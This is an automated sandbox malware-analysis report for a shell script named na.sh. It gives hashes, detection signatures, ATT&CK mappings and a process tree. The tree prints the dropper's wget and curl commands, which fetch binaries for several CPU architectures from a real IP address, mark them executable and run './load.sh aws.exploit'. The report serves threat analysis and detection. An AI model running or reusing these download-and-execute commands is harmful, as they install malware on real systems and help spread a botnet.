ebbb403ae5c2bf4cbfa72c30f5e061d73fa5465c0a7c455e18a2cc73b413d160

Analysis

max time kernel
150s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
17-10-2024 06:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.sh
Size

4KB
MD5

2d520ab45c89c24520e0754fd1971be2
SHA1

96e5de0ce70de4fa0f1adcd586aa49608bd578ea
SHA256

ebbb403ae5c2bf4cbfa72c30f5e061d73fa5465c0a7c455e18a2cc73b413d160
SHA512

496e0ee73afc2d1263db3012dec1578c3d493229a28e4fe97d5b63390ed86441b0fc42bc3f7d494569209b8642e8f5c9e239907cd1b8124bdeff619ba85e902b
SSDEEP

96:vNVjWNw41Nx/SNN7uNdMdEpFDNn90NUsRN2mHNRfCN3t8NueXNyS7NGWfNPl3:IO4Fi

Score

7^/10

antivm defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
772	chmod
782	chmod
788	chmod

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/load.sh	773	load.sh
/tmp/load.sh	783	load.sh
/tmp/load.sh	789	load.sh

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx
behavioral2/files/fstream-5.dat	upx

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
775	wget
780	curl
781	cat

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	curl
File opened for modification	/tmp/load.sh	na.sh
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	curl

/tmp/na.sh
/tmp/na.sh
1⤵
- Writes file to tmp directory
PID:639
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Writes file to tmp directory
  PID:641
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:746
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:771
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh na.sh
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/load.sh
  ./load.sh aws.exploit
  2⤵
  - Executes dropped EXE
  PID:773
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:775
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:780
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:781
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh na.sh
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/load.sh
  ./load.sh aws.exploit
  2⤵
  - Executes dropped EXE
  PID:783
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Writes file to tmp directory
  PID:785
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:786
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  PID:787
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh na.sh
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/load.sh
  ./load.sh aws.exploit
  2⤵
  - Executes dropped EXE
  PID:789
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Writes file to tmp directory
  PID:791
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

Filesize
33KB

MD5
6d1b6e91b1e2037fbf62ca7ddcf04932

SHA1
d0769095ec2e678074eb206b3537022129c1a776

SHA256
7f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782

SHA512
7397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38

Download Submit
/tmp/load.sh

Filesize
35KB

MD5
fd5d7deebbb62aee931a1701a1042450

SHA1
4adc94ce9de13647815a16d6514b73e109c80785

SHA256
7a36bd7a9d19b6d48807264712141dd0543ffebd9db923a76799ffd687f352c9

SHA512
cb7beeb8d88ad48ac447b69b215738cdf1d706cb88c4945d0a0837c07dfe41a74107f9c4d7fccc5c7e5719ee9a912452ba3c53c360252bd46978f5d27c1b6df4

Download Submit
/tmp/load.sh

Filesize
37KB

MD5
144cc0c6dfb6f6e395065b02825a9ad1

SHA1
dfe5d7d8bef4511b42be1ae0235f7469d97bf789

SHA256
117cd63b79b8c0d3753ac6907206872d6527c2d6a641776c1021302d5dcec2b2

SHA512
9e5ca9ee3ebef09688d74de6bb4af9d6c1003173ee5846cd2370d4774e9bc92fef317113b19529cd2a5b1d18a38a626ebf6ed2da05e6c7b66e0d1b69d8ddc5d5

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads